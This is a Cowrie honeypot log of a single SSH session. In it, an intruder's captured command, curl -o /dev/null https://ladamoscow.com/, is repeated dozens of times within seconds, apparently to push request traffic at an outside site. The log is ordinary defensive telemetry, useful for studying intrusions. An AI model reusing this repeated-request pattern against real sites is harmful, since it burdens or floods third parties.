{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.662473Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.663512Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.699960Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.700958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.738476Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.739484Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.777842Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.778887Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.821470Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.822488Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.869172Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.870182Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.910682Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.911650Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:39.950297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:39.951367Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.016504Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.018022Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.056630Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.057687Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.105341Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.106516Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.143404Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.144487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.184353Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.185496Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.222865Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.223928Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.263784Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.265182Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.303205Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.304306Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.341980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.343250Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.380180Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.382231Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.422007Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.423000Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.468191Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.469637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.513020Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.514505Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.552533Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.553613Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.591967Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.592990Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.636889Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.637870Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.676675Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.677615Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.717021Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.718150Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.754676Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.755656Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.793871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.794934Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.832168Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.833343Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.879982Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.880983Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.918922Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.919908Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.957793Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.958868Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:40.996350Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:40.997467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.037905Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.039038Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.078417Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.079413Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.116217Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.117204Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.155086Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.156199Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.192712Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.193703Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.230577Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.231807Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.268468Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.269469Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.305834Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.306785Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.349771Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.350996Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.387856Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.388670Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.425690Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.426503Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.464725Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.466016Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.504116Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.505217Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.543401Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.544430Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.587005Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.588467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.635615Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.636800Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.679110Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.679980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.717379Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.719004Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.757914Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.759390Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.801162Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.802355Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.840002Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.842102Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.882197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.883326Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.957692Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:41.958954Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:41.999066Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.000503Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.045212Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.046418Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.083078Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.084072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.121150Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.122544Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.158893Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.159948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.284096Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.285134Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.321630Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.322895Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.359457Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.360479Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.398721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
